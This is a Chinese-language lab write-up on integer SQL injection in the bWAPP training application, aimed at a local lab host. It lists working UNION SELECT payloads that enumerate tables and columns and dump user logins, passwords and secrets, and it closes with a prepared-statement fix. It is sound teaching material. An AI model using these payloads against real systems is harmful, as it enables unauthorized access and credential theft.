bWAPP-SQLInjection2

整型注入

基本流程

寻找注入点，判断是否存在注入

1 and 1=1 #
#正常回显
1 and 1=2 #
#错误回显
#则存在注入

http://192.168.80.2/sqli_2.php?movie=100+or+1=1#&action=go

192.168.80.2/sqli_2.php?movie=1+and+1=1#&action=go

192.168.80.2/sqli_2.php?movie=1+and+1=2#&action=go

判断字段数量

1 order by 7 #
--正常回显
1 order by 8 #
--錯誤回显

192.168.80.2/sqli_2.php?movie=1+order+by+7#&action=go

192.168.80.2/sqli_2.php?movie=1+order+by+8#&action=go

判断可注入字段位置

0 union select 1,2,3,4,5,6,7 #
-- union 当前面对为false时执行union后面的语句,故选用0，不存在的字符

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,2,3,4,5,6,7#&action=go

使用内置函数查看数据库信息

database();\version();\user()..

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,database(),version(),user(),5,6,7#&action=go

查看表名

0+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()

使用 group_concat()函数把获取的表拼接成字符串，方便查看。

使用 where table_schema=database()指定当前数据库的表，避免获取全部表，导致获取的表数量过多，无法显示完整

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()#&action=go

获取表字段名

0+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name="users"+and+table_schema=database()#

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name="users"+and+table_schema=database()#&action=go

提权相关信息

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,login,password,secret,email,6,7+from+users#&action=go
--只能显示一行
--可通过 limit 进行逐个提取
--http://192.168.80.2/sqli_2.php?movie=0+union+select+1,login,password,secret,email,6,7+from+users limit 1,1#&action=go

limit 可接收一个或两个整型参数

1. 接收一个参数

   SELECT * FROM table LIMIT 5; //检索前5个记录行 换句话说，LIMIT n 等价于 LIMIT 0,n。

2. 接收两个参数（第一位表示从第几行开始偏移，第二位表示偏移最大数目）

   SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15

limit的用法

也可通过group_concat进行拼接输出

http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,'-',password,'-') from users limit 0,1),3,4,5,6,7 #

演练

low

http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,'-',password,'-') from users limit 0,1),3,4,5,6,7 #

mid

使用addslashes();函数进行过滤。受影响字符单引号（’）、双引号（"）、反斜线（\）与 NUL（NULL 字符）。

但是整型注入不受影响（不存在 ’ 闭合的问题，故不受影响）

http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,password) from users limit 0,1),3,4,5,6,7 #

high

使用预处理防止sql注入

    $id = $_GET["movie"];

    $sql = "SELECT title, release_year, genre, main_character, imdb FROM movies WHERE id =?";  
	// ? 为占位符，等待接收的参数传入
    if($stmt = $link->prepare($sql)) 
    // if($stmt = mysqli_prepare($link, $sql))                
    {

        // Binds the parameters for markers
        $stmt->bind_param("s", $id);
        // mysqli_stmt_bind_param($stmt, "s", $id);

        // Executes the query
        $stmt->execute();
        // mysqli_stmt_execute($stmt);

        // Binds the result variables
        $stmt->bind_result($title, $release_year, $genre, $main_character, $imdb);
        // mysqli_stmt_bind_result($stmt, $title, $release_year, $genre, $main_character, $imdb);

        // Stores the result, necessary to count the number of rows
        $stmt->store_result();      
        // mysqli_stmt_store_result($stmt);

        // Prints the number of rows
        // printf("Number of rows: %d.\n", mysqli_stmt_num_rows($stmt));
    }

mysqli_prepare

预编译防止sql注入